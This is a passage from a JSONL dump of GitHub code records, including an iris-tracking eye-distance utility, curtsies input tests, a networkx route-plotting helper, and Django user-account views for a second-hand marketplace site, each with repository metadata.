"usage_type": "call"}, {"api_name": "PySide6.QtWidgets.QLabel", "line_number": 1099, "usage_type": "call"}, {"api_name": "PySide6.QtWidgets.QLabel", "line_number": 1101, "usage_type": "call"}, {"api_name": "PySide6.QtWidgets.QVBoxLayout", "line_number": 1106, "usage_type": "call"}, {"api_name": "PySide6.QtWidgets.QLabel", "line_number": 1107, "usage_type": "call"}, {"api_name": "PySide6.QtWidgets.QHBoxLayout", "line_number": 1108, "usage_type": "call"}, {"api_name": "PySide6.QtWidgets.QVBoxLayout", "line_number": 1115, "usage_type": "call"}, {"api_name": "PySide6.QtWidgets.QHBoxLayout", "line_number": 1117, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 1135, "usage_type": "call"}, {"api_name": "os.path", "line_number": 1135, "usage_type": "attribute"}, {"api_name": "PySide6.QtWidgets.QFileDialog.getOpenFileNames", "line_number": 1136, "usage_type": "call"}, {"api_name": "PySide6.QtWidgets.QFileDialog", "line_number": 1136, "usage_type": "name"}, {"api_name": "os.path.dirname", "line_number": 1154, "usage_type": "call"}, {"api_name": "os.path", "line_number": 1154, "usage_type": "attribute"}, {"api_name": "utilitarios.xls2file", "line_number": 1158, "usage_type": "call"}, {"api_name": "numpy.unique", "line_number": 1169, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 1174, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 1176, "usage_type": "call"}, {"api_name": "PySide6.QtWidgets.QTableWidget", "line_number": 1183, "usage_type": "name"}, {"api_name": "PySide6.QtWidgets.QHeaderView.Stretch", "line_number": 1198, "usage_type": "attribute"}, {"api_name": "PySide6.QtWidgets.QHeaderView", "line_number": 1198, "usage_type": "name"}, {"api_name": "PySide6.QtWidgets.QHeaderView.Stretch", "line_number": 1199, "usage_type": "attribute"}, {"api_name": "PySide6.QtWidgets.QHeaderView", "line_number": 1199, "usage_type": "name"}, {"api_name": "PySide6.QtWidgets.QPushButton", "line_number": 1210, "usage_type": "call"}, {"api_name": "PySide6.QtWidgets.QTableWidgetItem", "line_number": 1211, "usage_type": "call"}, {"api_name": "PySide6.QtWidgets.QTableWidgetItem", "line_number": 1212, "usage_type": "call"}, {"api_name": "PySide6.QtCore.Qt.ItemIsEditable", "line_number": 1216, "usage_type": "attribute"}, {"api_name": "PySide6.QtCore.Qt", "line_number": 1216, "usage_type": "name"}, {"api_name": "PySide6.QtCore.Qt.ItemIsEditable", "line_number": 1217, "usage_type": "attribute"}, {"api_name": "PySide6.QtCore.Qt", "line_number": 1217, "usage_type": "name"}, {"api_name": "PySide6.QtWidgets.QPushButton", "line_number": 1230, "usage_type": "call"}, {"api_name": "PySide6.QtWidgets.QComboBox", "line_number": 1231, "usage_type": "call"}, {"api_name": "PySide6.QtWidgets.QComboBox", "line_number": 1232, "usage_type": "call"}, {"api_name": "os.path.dirname", "line_number": 1276, "usage_type": "call"}, {"api_name": "os.path", "line_number": 1276, "usage_type": "attribute"}, {"api_name": "os.path.abspath", "line_number": 1276, "usage_type": "call"}, {"api_name": "os.chdir", "line_number": 1277, "usage_type": "call"}, {"api_name": "ctypes.windll.shell32.SetCurrentProcessExplicitAppUserModelID", "line_number": 1281, "usage_type": "call"}, {"api_name": "ctypes.windll", "line_number": 1281, "usage_type": "attribute"}, {"api_name": "PySide6.QtWidgets.QApplication", "line_number": 1282, "usage_type": "call"}, {"api_name": "sys.argv", "line_number": 1282, "usage_type": "attribute"}, {"api_name": "sys.exit", "line_number": 1293, "usage_type": "call"}]} +{"seq_id": "72526826843", "text": "import numpy as np\nimport math\nfrom typing import List, Mapping, Optional, Tuple, Union\n\n\ndef denormalize_coordinates(\n normalized_x: float, normalized_y: float, image_width: int, image_height: int\n) -> Union[None, Tuple[int, int]]:\n \"\"\"Converts normalized value pair to pixel coordinates.\"\"\"\n\n # Checks if the float value is between 0 and 1.\n def is_valid_normalized_value(value: float) -> bool:\n return (value > 0 or math.isclose(0, value)) and (\n value < 1 or math.isclose(1, value)\n )\n\n if not (\n is_valid_normalized_value(normalized_x)\n and is_valid_normalized_value(normalized_y)\n ):\n # TODO: Draw coordinates even if it's outside of the image bounds.\n return None\n x_px = min(math.floor(normalized_x * image_width), image_width - 1)\n y_px = min(math.floor(normalized_y * image_height), image_height - 1)\n return x_px, y_px\n\n\ndef distance(point_1, point_2):\n \"\"\"Calculate l2-norm between two points\"\"\"\n dist = sum([(i - j) ** 2 for i, j in zip(point_1, point_2)]) ** 0.5\n return dist\n\n\ndef get_ear(landmarks, refer_idxs, frame_width, frame_height):\n \"\"\"\n Calculate Eye Aspect Ratio for one eye.\n\n Args:\n landmarks: (list) Detected landmarks list\n refer_idxs: (list) Index positions of the chosen landmarks\n in order P1, P2, P3, P4, P5, P6\n frame_width: (int) Width of captured frame\n frame_height: (int) Height of captured frame\n\n Returns:\n ear: (float) Eye aspect ratio\n \"\"\"\n try:\n # Compute the euclidean distance between the horizontal\n coords_points = []\n for i in refer_idxs:\n lm = landmarks[i]\n coord = denormalize_coordinates(lm[0], lm[1], frame_width, frame_height)\n coords_points.append(coord)\n\n # Eye landmark (x, y)-coordinates\n P2_P6 = distance(coords_points[1], coords_points[5])\n P3_P5 = distance(coords_points[2], coords_points[4])\n P1_P4 = distance(coords_points[0], coords_points[3])\n\n # Compute the eye aspect ratio\n ear = (P2_P6 + P3_P5) / (2.0 * P1_P4)\n\n except:\n ear = 0.0\n coords_points = None\n\n return ear, coords_points\n\n\ndef calculate_avg_ear(landmarks, left_eye_idxs, right_eye_idxs, image_w, image_h):\n \"\"\"Calculate Eye aspect ratio\"\"\"\n\n left_ear, left_lm_coordinates = get_ear(landmarks, left_eye_idxs, image_w, image_h)\n right_ear, right_lm_coordinates = get_ear(\n landmarks, right_eye_idxs, image_w, image_h\n )\n Avg_EAR = (left_ear + right_ear) / 2.0\n\n return Avg_EAR, (left_lm_coordinates, right_lm_coordinates)\n\n\ndef eye_converter(\n frame,\n video,\n left_eye_2d,\n right_eye_2d,\n face_center_p1_2d,\n face_center_p2_2d,\n warpped=False,\n left_eye_depth_mm=None,\n right_eye_depth_mm=None,\n):\n p1 = face_center_p1_2d[:2]\n p2 = face_center_p2_2d[:2]\n # frame = cv2.line(frame, (int(p1[0] * video.frame_width), int(p1[1] * video.frame_height)), (int(p2[0] * video.frame_width), int(p2[1] * video.frame_height)), (0, 0, 255), 1)\n p3 = left_eye_2d[:2]\n p4 = right_eye_2d[:2]\n # frame = cv2.line(frame, (int(p3[0] * video.frame_width), int(p3[1] * video.frame_height)), (int(p4[0] * video.frame_width), int(p4[1] * video.frame_height)), (0, 255, 0), 1)\n\n denom = (p1[0] - p2[0]) * (p3[1] - p4[1]) - (p1[1] - p2[1]) * (p3[0] - p4[0])\n origin_x = (\n (p1[0] * p2[1] - p1[1] * p2[0]) * (p3[0] - p4[0])\n - (p1[0] - p2[0]) * (p3[0] * p4[1] - p3[1] * p4[0])\n ) / denom\n origin_y = (\n (p1[0] * p2[1] - p1[1] * p2[0]) * (p3[1] - p4[1])\n - (p1[1] - p2[1]) * (p3[0] * p4[1] - p3[1] * p4[0])\n ) / denom\n # frame = cv2.circle(frame, (int(origin_x * video.frame_width), int(origin_y * video.frame_height)), 5, (255, 0, 0), -1)\n if warpped:\n left_eye_dist_px = np.sqrt(\n (\n ((p3[0] - origin_x) * video.frame_width) ** 2\n + ((p3[1] - origin_y) * video.frame_height) ** 2\n )\n )\n right_eye_dist_px = np.sqrt(\n (\n ((p4[0] - origin_x) * video.frame_width) ** 2\n + ((p4[1] - origin_y) * video.frame_height) ** 2\n )\n )\n # frame = cv2.putText(frame, f\"{int(left_eye_dist_px)} px\", (int(p3[0] * video.frame_width), int(p3[1] * video.frame_height) + 20), cv2.FONT_HERSHEY_COMPLEX_SMALL, 1, (0, 0, 255))\n # frame = cv2.putText(frame, f\"{int(right_eye_dist_px)} px\", (int(p4[0] * video.frame_width), int(p4[1] * video.frame_height) + 20), cv2.FONT_HERSHEY_COMPLEX_SMALL, 1, (0, 0, 255))\n # cv2.imshow(\"Eye distance (Warpped)\", frame)\n return (left_eye_dist_px, right_eye_dist_px), None\n else:\n\n left_eye_dist_px = np.sqrt(\n (\n ((p3[0] - origin_x) * video.frame_width) ** 2\n + ((p3[1] - origin_y) * video.frame_height) ** 2\n )\n )\n right_eye_dist_px = np.sqrt(\n (\n ((p4[0] - origin_x) * video.frame_width) ** 2\n + ((p4[1] - origin_y) * video.frame_height) ** 2\n )\n )\n\n eye_dist_2d_px = left_eye_dist_px + right_eye_dist_px\n eye_dist_2d_mm = eye_dist_2d_px / video.focal_length * left_eye_depth_mm\n # print(eye_dist_2d_mm)\n\n eye_dist_mm = np.sqrt(\n eye_dist_2d_mm**2 + (left_eye_depth_mm - right_eye_depth_mm) ** 2\n )\n left_eye_dist_mm = left_eye_dist_px / eye_dist_2d_px * eye_dist_mm\n right_eye_dist_mm = eye_dist_mm - left_eye_dist_mm\n # frame = cv2.putText(frame, f\"{int(left_eye_dist_px)}px, {int(left_eye_dist_mm)}mm\", (int(p3[0] * video.frame_width) - 50, int(p3[1] * video.frame_height) + 20), cv2.FONT_HERSHEY_COMPLEX_SMALL, 1, (0, 255, 0))\n # frame = cv2.putText(frame, f\"{int(right_eye_dist_px)}px, {int(right_eye_dist_mm)}mm\", (int(p4[0] * video.frame_width), int(p4[1] * video.frame_height) + 50), cv2.FONT_HERSHEY_COMPLEX_SMALL, 1, (255, 255, 0))\n # cv2.imshow(\"Eye distance (Unwarpped)\", frame)\n return (left_eye_dist_px, right_eye_dist_px), (\n left_eye_dist_mm,\n right_eye_dist_mm,\n )\n", "repo_name": "cortictechnology/cortic-platform-samples", "sub_path": "services/iris_tracking_service/utils.py", "file_name": "utils.py", "file_ext": "py", "file_size_in_byte": 6214, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "86", "api": [{"api_name": "math.isclose", "line_number": 13, "usage_type": "call"}, {"api_name": "math.isclose", "line_number": 14, "usage_type": "call"}, {"api_name": "math.floor", "line_number": 23, "usage_type": "call"}, {"api_name": "math.floor", "line_number": 24, "usage_type": "call"}, {"api_name": "typing.Union", "line_number": 8, "usage_type": "name"}, {"api_name": "typing.Tuple", "line_number": 8, "usage_type": "name"}, {"api_name": "numpy.sqrt", "line_number": 112, "usage_type": "call"}, {"api_name": "numpy.sqrt", "line_number": 118, "usage_type": "call"}, {"api_name": "numpy.sqrt", "line_number": 130, "usage_type": "call"}, {"api_name": "numpy.sqrt", "line_number": 136, "usage_type": "call"}, {"api_name": "numpy.sqrt", "line_number": 147, "usage_type": "call"}]} +{"seq_id": "24875093979", "text": "import unittest\nfrom mock import Mock\nfrom curtsies import events\nimport select\n\nfrom curtsies.input import Input, getpreferredencoding\n\nclass TestInput(unittest.TestCase):\n def test_create(self):\n inp = Input()\n\n def test_iter(self):\n inp = Input()\n inp.send = Mock()\n inp.send.return_value = None\n for i, e in zip(range(3), inp):\n self.assertEqual(e, None)\n self.assertEqual(inp.send.call_count, 3)\n\n def test_mocks(self):\n events.a = 10\n self.assertTrue(True)\n\n def test_mocks2(self):\n self.assertEqual(events.a, 10)\n\n def test_send(self):\n inp = Input()\n inp.unprocessed_bytes = [b'a']\n self.assertEqual(inp.send('nonsensical value'), u'a')\n\n def test_send_nonblocking_no_event(self):\n inp = Input()\n inp.unprocessed_bytes = []\n self.assertEqual(inp.send(0), None)\n\n def test_nonblocking_read(self):\n inp = Input()\n self.assertEqual(inp.nonblocking_read(), 0)\n\n def test_send_paste(self):\n inp = Input()\n inp.unprocessed_bytes = []\n inp.wait_for_read_ready_or_timeout = Mock()\n inp.wait_for_read_ready_or_timeout.return_value = (True, None)\n inp.nonblocking_read = Mock()\n n = inp.paste_threshold + 1\n\n first_time = [True]\n def side_effect():\n if first_time:\n inp.unprocessed_bytes.extend([b'a']*n)\n first_time.pop()\n return n\n else:\n return None\n inp.nonblocking_read.side_effect = side_effect\n\n r = inp.send(0)\n self.assertEqual(type(r), events.PasteEvent)\n self.assertEqual(r.events, [u'a'] * n)\n", "repo_name": "amjith/curtsies", "sub_path": "tests/test_input.py", "file_name": "test_input.py", "file_ext": "py", "file_size_in_byte": 1723, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "github-code", "pt": "86", "api": [{"api_name": "unittest.TestCase", "line_number": 8, "usage_type": "attribute"}, {"api_name": "curtsies.input.Input", "line_number": 10, "usage_type": "call"}, {"api_name": "curtsies.input.Input", "line_number": 13, "usage_type": "call"}, {"api_name": "mock.Mock", "line_number": 14, "usage_type": "call"}, {"api_name": "curtsies.events.a", "line_number": 21, "usage_type": "attribute"}, {"api_name": "curtsies.events", "line_number": 21, "usage_type": "name"}, {"api_name": "curtsies.events.a", "line_number": 25, "usage_type": "attribute"}, {"api_name": "curtsies.events", "line_number": 25, "usage_type": "name"}, {"api_name": "curtsies.input.Input", "line_number": 28, "usage_type": "call"}, {"api_name": "curtsies.input.Input", "line_number": 33, "usage_type": "call"}, {"api_name": "curtsies.input.Input", "line_number": 38, "usage_type": "call"}, {"api_name": "curtsies.input.Input", "line_number": 42, "usage_type": "call"}, {"api_name": "mock.Mock", "line_number": 44, "usage_type": "call"}, {"api_name": "mock.Mock", "line_number": 46, "usage_type": "call"}, {"api_name": "curtsies.events.PasteEvent", "line_number": 60, "usage_type": "attribute"}, {"api_name": "curtsies.events", "line_number": 60, "usage_type": "name"}]} +{"seq_id": "25948156614", "text": "import math\nimport networkx as nx\nimport matplotlib.pyplot as plt\n\n\n# Function to calculate distance between two coordinates using Haversine formula\ndef haversine(coord1, coord2):\n lat1, lon1 = coord1\n lat2, lon2 = coord2\n \n # Radius of the Earth in km\n R = 6371\n dlat = lat2 - lat1\n dlon = lon2 - lon1\n a = (pow(math.sin(math.radians(dlat) / 2), 2) +\n math.cos(math.radians(lat1)) * math.cos(math.radians(lat2)) *\n pow(math.sin(math.radians(dlon) / 2), 2))\n c = 2 * math.atan2(math.sqrt(a), math.sqrt(1 - a))\n return R * c\n\ndef read_file(filename):\n adjacency_list = {}\n\n with open(filename, 'r') as file:\n for line in file:\n node1, node2 = line.strip().split()\n\n if node1 in adjacency_list:\n adjacency_list[node1].append(node2)\n else:\n adjacency_list[node1] = [node2]\n\n if node2 in adjacency_list:\n adjacency_list[node2].append(node1)\n else:\n adjacency_list[node2] = [node1]\n\n return adjacency_list\n\ndef read_coordinates(filename):\n coordinates = {}\n\n with open(filename, 'r') as file:\n for line in file:\n city, latitude, longitude = line.strip().split(',')\n coordinates[city] = [float(latitude.strip()), float(longitude.strip())]\n\n return coordinates\n\n\ndef show_graph(adjacency_list, node_colors, route_nodes):\n\n # # Change the node color for every visited node\n for i, route_node in enumerate(route_nodes):\n if i == 0:\n node_colors[route_node] = 'green'\n elif i == len(route_nodes) - 1:\n node_colors[route_node] = 'orange'\n else:\n node_colors[route_node] = 'red'\n\n # Change the edge color for every single pair node\n edge_colors = {}\n for i, route_node in enumerate(route_nodes):\n if i < len(route_nodes) - 1:\n edge_colors[(route_node, route_nodes[i + 1])] = 'red'\n\n G = nx.DiGraph()\n for node, neighbors in adjacency_list.items():\n G.add_node(node)\n for neighbor in neighbors:\n G.add_edge(node, neighbor)\n\n # Plot the graph using Kamada-Kawai layout\n plt.figure(figsize=(12, 8))\n\n plt.subplot(122)\n pos = nx.kamada_kawai_layout(G)\n nx.draw(\n G, \n pos, \n with_labels=True, \n node_size=500, \n font_size=4, \n font_color='white', \n node_color=[node_colors[node] for node in G.nodes()],\n edge_color=[edge_colors.get(edge, 'black') for edge in G.edges()])\n\n plt.tight_layout()\n plt.show()", "repo_name": "agussusanto18/AI_Assignments_Search_Methods", "sub_path": "utils.py", "file_name": "utils.py", "file_ext": "py", "file_size_in_byte": 2701, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "86", "api": [{"api_name": "math.sin", "line_number": 15, "usage_type": "call"}, {"api_name": "math.radians", "line_number": 15, "usage_type": "call"}, {"api_name": "math.cos", "line_number": 16, "usage_type": "call"}, {"api_name": "math.radians", "line_number": 16, "usage_type": "call"}, {"api_name": "math.sin", "line_number": 17, "usage_type": "call"}, {"api_name": "math.radians", "line_number": 17, "usage_type": "call"}, {"api_name": "math.atan2", "line_number": 18, "usage_type": "call"}, {"api_name": "math.sqrt", "line_number": 18, "usage_type": "call"}, {"api_name": "networkx.DiGraph", "line_number": 68, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 75, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 75, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 77, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 77, "usage_type": "name"}, {"api_name": "networkx.kamada_kawai_layout", "line_number": 78, "usage_type": "call"}, {"api_name": "networkx.draw", "line_number": 79, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.tight_layout", "line_number": 89, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 89, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 90, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 90, "usage_type": "name"}]} +{"seq_id": "71271964444", "text": "import re\nfrom django.core.mail import send_mail # 发送邮件\nfrom django.contrib.auth import authenticate, login, logout # 验证用户\nfrom django.core.paginator import Paginator\nfrom django.http import HttpResponse\nfrom django.views import View # 类视图\nfrom django.shortcuts import render, redirect # redirect是跳转页面所需要的方法\nfrom django.urls import reverse # reverse可以通过页面的名字来反向解析出页面的地址\nfrom user.models import User, Address\nfrom itsdangerous import TimedJSONWebSignatureSerializer as Serializer # 限时激活的模块并进行重命名\nfrom SecondHandMarket import settings\nfrom itsdangerous import SignatureExpired # 激活时间到期异常\nfrom order.models import OrderGoods, OrderInfo\nfrom celery_tasks.tasks import send_register_active_email # 导入异步处理任务中用来发送邮件的方法\nfrom utils.mixin import LoginRequiredMixin # 需要登录后才能访问的视图界面\nfrom django_redis import get_redis_connection # 连接redis\nfrom goods.models import GoodsSKU\n# 用类视图来处理界面的显示函数\n# 注册界面视图\nclass RegisterView(View): # 继承View是为了在urls中可以使用它的默认方法as_view()来在视图上显示类中的内容\n # 如果是get请求就调用get函数,如果是post请求就调用post函数\n # 通过post和get方式的不同来进行不同的处理\n def get(self, request): # get是View的as_view()函数内部将GET请求方式全部小写为get,也就是说这里是调用get方法来达到获取get请求的目的\n # 显示注册页面\n return render(request, 'register.html')\n # 下面post方法必须写post不能写其他的名字,因为是将POST小写为post而得到的\n def post(self, request):\n # 进行注册处理\n # 接收数据\n username = request.POST.get('user_name')\n password = request.POST.get('pwd')\n cpassword = request.POST.get('cpwd')\n email = request.POST.get('email')\n allow = request.POST.get('allow')\n\n # 进行数据校验\n if not all([username, password, email]): # all()函数对于其中的迭代对象只有全部迭代才会返回true\n # 数据不完整\n return render(request, 'register.html', {'errmsg': '数据不完整'})\n\n # 校验邮箱\n # 用于判断邮箱格式的正则表达式\n if not re.match(r'^[a-z0-9][\\w.\\-]*@[a-z0-9\\-]+(\\.[a-z]{2,5}){1,2}$', email):\n return render(request, 'register.html', {'errmsg': '邮箱格式不正确'})\n\n if allow != 'on':\n return render(request, 'register.html', {'errmsg': '请同意协议'})\n\n # 校验用户名是否重复\n try:\n # get方法只能返回一条数据,如果查询不到则返回一个DoesNotExist的错误\n user = User.objects.get(username=username) # 第一个username是表达中的属性,第二个username为接收到的username\n except User.DoesNotExist:\n # 用户名不存在\n user = None\n\n if user:\n # 用户名已存在\n return render(request, 'register.html', {'errmsg': '用户名已存在'})\n # 判断两次的密码是否一致\n if cpassword != password:\n return render(request, 'register.html', {'errmsg': '两次输入的密码不一致'})\n\n # 进行业务处理: 进行用户注册\n user = User.objects.create_user(username, email, password) # 通过Django自带的create_user方法来写入,注意顺序不能错\n user.is_active = 0 # 这里的user就是注册的用户,对注册用户默认设置为不激活,后面通过邮箱来进行激活\n user.save()\n # 通过邮件发送激活地址来激活用户的账户\n # 激活地址为http://127.0.0.1:8000/user/active/user_id\n '''user_id是在user表中用户的id,每个用户具有唯一性,为了防止恶意激活(判断这个是id从而激活其他用户),\n 需要将user_id进行加密,这里通过itsdangerous包来进行带有时效性的加密'''\n # 加密\n serializer = Serializer(settings.SECRET_KEY, 3600)\n info = {'confirm':user.id} # 定义一个字典用来存放id\n # f = open('token.txt', 'a')\n token = serializer.dumps(info).decode() # dump进行加密,加密的为byte格式,前面会有一个b\n # decode()将byte格式转换为字符串格式\n # 发邮件\n send_register_active_email.delay(email, username, token) # 使用delay函数将发送邮件的任务放到异步处理器,括号内为要传递的参数\n # 返回应答, 跳转到首页\n return redirect(reverse('goods:index')) # 通过反向解析获得地址从而来跳转页面\n# 激活界面视图\nclass ActiveView(View):\n def get(self, request, token):\n # 不管加密还是解密都需要写下面的对象\n serializer = Serializer(settings.SECRET_KEY, 3600) # 前者表示加密的秘钥,可以随意设置,这里设置为django默认的一种秘钥,3600表示激活时间为3600秒\n try:\n info = serializer.loads(token) # 对token进行解密\n user_id = info['confirm'] # 获取解密后的user_id\n # 根据用户id来获取用户的信息并激活用户\n user = User.objects.get(id=user_id)\n user.is_active = 1\n user.save()\n # 激活成功后跳转到登录界面\n return redirect(reverse('user:login'))\n except SignatureExpired as e:\n # 表明激活时间已过\n return HttpResponse('激活链接已过期')\n# 登录界面视图\nclass LoginView(View):\n def get(self, request):\n # 判断是否记录了用户名\n if 'username' in request.COOKIES:\n username = request.COOKIES.get('username')\n checked = 'checked'\n else:\n username = ''\n checked = ''\n return render(request, 'login.html', {'username':username, 'checked':checked})\n\n def post(self, request):\n # 接受数据\n username = request.POST.get('username')\n pwd = request.POST.get('pwd')\n # 判断数据是否全部接受\n if all([username, pwd]):\n # 校验数据,使用django内置的校验系统进行校验\n user = authenticate(username=username, password=pwd)\n if user is not None:\n # 验证成功,使用Django内部的用户登录来记录用户的登录状态\n # 判断用户是否激活\n if user.is_active:\n # 记录用户的登录状态\n login(request, user)\n # 获取登录后索要跳转到的地址\n '''例如用户信息界面如何用户没有登录在页面中输入相关的网址不能直接跳转到用户信息界面,\n 要跳转到指定的界面,这里指定的界面后面有next,且next后面的地址就是用户信息界面'''\n next_url = request.GET.get('next', reverse('goods:index')) # 如果没有得到next值,next_url默认赋值为goods:index反向解析的网址\n # 带着登录状态跳转到next_url页面,默认跳转到首页\n response = redirect(next_url)\n # 判断是否需要记住用户名\n remember = request.POST.get('remember')\n if remember == 'on':\n # 需要记住用户名\n response.set_cookie('username', username, max_age=7*24*3600) # 设置过期时间为一周\n else:\n response.delete_cookie('username')\n return response\n\n\n\n else:\n # 用户未激活\n return render(request, 'login.html', {'errmsg':'用户未激活'})\n\n else:\n # 判断用户是否注册\n try:\n user = User.objects.get(username=username)\n return render(request, 'login.html', {'errmsg':'密码不正确'})\n except User.DoesNotExist:\n return render(request, 'login.html', {'errmsg':'用户尚未注册'})\n\n\n # No backend authenticated the credentials\n\n else:\n return render(request, 'login.html', {'errmsg':'用户名或密码没有填写'})\n# /user/logout\nclass LogoutView(View):\n # 退出登录\n def get(self, request):\n # 清除用户的session信息\n logout(request)\n # 跳转到首页\n return redirect(reverse('goods:index'))\n# /user\nclass UserInfoView(LoginRequiredMixin, View): # 这两个参数的顺序不能颠倒,颠倒可能会报错\n '''用户中心-信息页'''\n def get(self, request):\n '''显示'''\n\n\n # 获取用户的个人信息\n user = request.user\n address = Address.objects.get_default_address(user) # 返回的是user相关的全部信息不只包括地址\n\n # 获取用户的历史浏览记录\n # from redis import StrictRedis\n # sr = StrictRedis(host='192.168.40.128', port='6379', db=9)\n con = get_redis_connection('default') # 拿到默认的链接\n\n history_key = 'history_%d'%user.id\n\n # 获取用户最新浏览的5个商品的id\n sku_ids = con.lrange(history_key, 0, 4) # 返回一个列表,下标从0到4,并且是倒序\n\n # 从数据库中查询用户浏览的商品的具体信息\n # goods_li = GoodsSKU.objects.filter(id__in=sku_ids) # 查找id在sku_ids之中的值,但不会直接根据sku_ids的顺序进行输出而是直接按照id的大小进行输出\n\n # goods_res = []\n # for a_id in sku_ids:\n # for goods in goods_li:\n # if a_id == goods.id:\n # goods_res.append(goods)\n\n # 遍历获取用户浏览的商品信息\n goods_li = []\n for id in sku_ids:\n goods = GoodsSKU.objects.get(id=id)\n goods_li.append(goods)\n\n # 组织上下文\n context = {'page':'user',\n 'address':address,\n 'goods_li':goods_li}\n\n # Django会给request对象添加一个属性request.user\n # 如果用户未登录->user是AnonymousUser类的一个实例对象\n # 如果用户登录->user是User类的一个实例对象\n # request.user.is_authenticated()\n # 除了你给模板文件传递的模板变量之外,django框架会把request.user也传给模板文件,在模板文件中可以直接调用user.is_authenticated来判断是否登录\n return render(request, 'user_center_info.html', context)\n\n# /user/order\nclass UserOrderView(LoginRequiredMixin, View):\n '''用户中心-订单页'''\n def get(self, request, page):\n '''显示'''\n # 获取用户的订单信息\n user = request.user\n orders = OrderInfo.objects.filter(user=user).order_by('-create_time')\n\n # 遍历获取订单商品的信息\n for order in orders:\n # 根据order_id查询订单商品信息\n order_skus = OrderGoods.objects.filter(order_id=order.order_id)\n\n # 遍历order_skus计算商品的小计\n for order_sku in order_skus:\n # 计算小计\n amount = order_sku.count * order_sku.price\n # 动态给order_sku增加属性amount,保存订单商品的小计\n order_sku.amount = amount\n\n # 动态给order增加属性,保存订单状态标题\n order.status_name = OrderInfo.ORDER_STATUS[order.order_status]\n # 动态给order增加属性,保存订单商品的信息\n order.order_skus = order_skus\n\n # 分页\n paginator = Paginator(orders, 1)\n\n # 获取第page页的内容\n try:\n page = int(page)\n except Exception as e:\n page = 1\n\n if page > paginator.num_pages:\n page = 1\n\n # 获取第page页的Page实例对象\n order_page = paginator.page(page)\n\n # todo: 进行页码的控制,页面上最多显示5个页码\n # 1.总页数小于5页,页面上显示所有页码\n # 2.如果当前页是前3页,显示1-5页\n # 3.如果当前页是后3页,显示后5页\n # 4.其他情况,显示当前页的前2页,当前页,当前页的后2页\n num_pages = paginator.num_pages\n if num_pages < 5:\n pages = range(1, num_pages + 1)\n elif page <= 3:\n pages = range(1, 6)\n elif num_pages - page <= 2:\n pages = range(num_pages - 4, num_pages + 1)\n else:\n pages = range(page - 2, page + 3)\n\n # 组织上下文\n context = {'order_page': order_page,\n 'pages': pages,\n 'page': 'order'}\n\n # 使用模板\n return render(request, 'user_center_order.html', context)\n\n\n# /user/address\nclass AddressView(LoginRequiredMixin, View):\n '''用户中心-地址页'''\n def get(self, request):\n '''显示'''\n # 获取登录用户对应User对象\n user = request.user\n\n # 获取用户的默认收货地址\n # try:\n # address = Address.objects.get(user=user, is_default=True) # models.Manager\n # except Address.DoesNotExist:\n # # 不存在默认收货地址\n # address = None\n address = Address.objects.get_default_address(user)\n\n # 使用模板\n return render(request, 'user_center_site.html', {'page':'address', 'address':address})\n\n def post(self, request):\n '''地址的添加'''\n # 接收数据\n receiver = request.POST.get('receiver')\n addr = request.POST.get('addr')\n zip_code = request.POST.get('zip_code')\n phone = request.POST.get('phone')\n\n # 校验数据\n if not all([receiver, addr, phone]):\n return render(request, 'user_center_site.html', {'errmsg':'数据不完整'})\n\n # 校验手机号\n if not re.match(r'^1[3|4|5|7|8][0-9]{9}$', phone):\n return render(request, 'user_center_site.html', {'errmsg':'手机格式不正确'})\n\n # 业务处理:地址添加\n # 如果用户已存在默认收货地址,添加的地址不作为默认收货地址,否则作为默认收货地址\n # 获取登录用户对应User对象\n user = request.user\n\n # try:\n # address = Address.objects.get(user=user, is_default=True)\n # except Address.DoesNotExist:\n # # 不存在默认收货地址\n # address = None\n\n address = Address.objects.get_default_address(user)\n\n if address:\n is_default = False\n else:\n is_default = True\n\n # 添加地址\n Address.objects.create(user=user,\n receiver=receiver,\n addr=addr,\n zip_code=zip_code,\n phone=phone,\n is_default=is_default)\n\n # 返回应答,刷新地址页面\n return redirect(reverse('user:address')) # get请求方式\n\n", "repo_name": "DedicationTechnology/SecondHandMarket", "sub_path": "apps/user/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 15385, "program_lang": "python", "lang": "zh", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "86", "api": [{"api_name": "django.views.View", "line_number": 20, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 25, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 39, "usage_type": "call"}, {"api_name": "re.match", "line_number": 43, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 44, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 47, "usage_type": "call"}, {"api_name": "user.models", "line_number": 52, "usage_type": "name"}, {"api_name": "user.models.User.objects.get", "line_number": 52, "usage_type": "call"}, {"api_name": "user.models.User.objects", "line_number": 52, "usage_type": "attribute"}, {"api_name": "user.models.User", "line_number": 52, "usage_type": "name"}, {"api_name": "user.models.User.DoesNotExist", "line_number": 53, "usage_type": "attribute"}, {"api_name": "user.models.User", "line_number": 53, "usage_type": "name"}, {"api_name": "user.models", "line_number": 55, "usage_type": "name"}, {"api_name": "user.models", "line_number": 57, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 59, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 62, "usage_type": "call"}, {"api_name": "user.models", "line_number": 65, "usage_type": "name"}, {"api_name": "user.models.User.objects.create_user", "line_number": 65, "usage_type": "call"}, {"api_name": "user.models.User.objects", "line_number": 65, "usage_type": "attribute"}, {"api_name": "user.models.User", "line_number": 65, "usage_type": "name"}, {"api_name": "user.models.is_active", "line_number": 66, "usage_type": "attribute"}, {"api_name": "user.models", "line_number": 66, "usage_type": "name"}, {"api_name": "user.models.save", "line_number": 67, "usage_type": "call"}, {"api_name": 